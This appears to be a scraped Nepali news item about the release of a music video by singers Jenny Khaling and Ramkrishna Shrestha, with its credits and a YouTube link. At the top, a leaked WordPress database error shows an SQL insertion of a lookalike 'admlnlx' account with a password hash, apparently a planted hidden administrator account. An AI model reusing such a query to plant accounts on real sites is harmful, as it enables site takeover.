WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BS8rIs4nxR0.lFOYU4/yajK2hZGMTl.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 14:43:23', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, १८ बैशाख, काठमाण्डौ । गायिका जेनी खालिङको ‘रसिलो त्यो मायाको बोलिमा’ बोलको गीतको म्युजिक भिडियो सार्वजनिक भएको छ ।
डि.पि. परिश्रमिको शब्द दिपक शर्माको संगितामा रहेको गीतमा गायिका जेनी खालिङ र गायक रामकृष्ण श्रेष्ठले स्वर दिएका छन ।
आज ओएसआर डिजिटल यूट्युब च्यानल मार्फत सर्वजनिक गरिएको म्युजिक भिडियोमा अनु शाह र रमेश खड्काले फिचरिङ्ग गरेका छन ।
प्रिज्मा रेकर्डिङ स्टुडियोमा रेकर्ड गरिएको सो गीतको भिडियोमा समन अधिकारीले निर्देशन गरेकाछन भने क्यामरा निरोज श्रेष्ठ र भिडियो सम्पादन शिलन लम्सालको रहेको छ ।
https://www.youtube.com/watch?v=QJg9Yf_aVVA&feature=share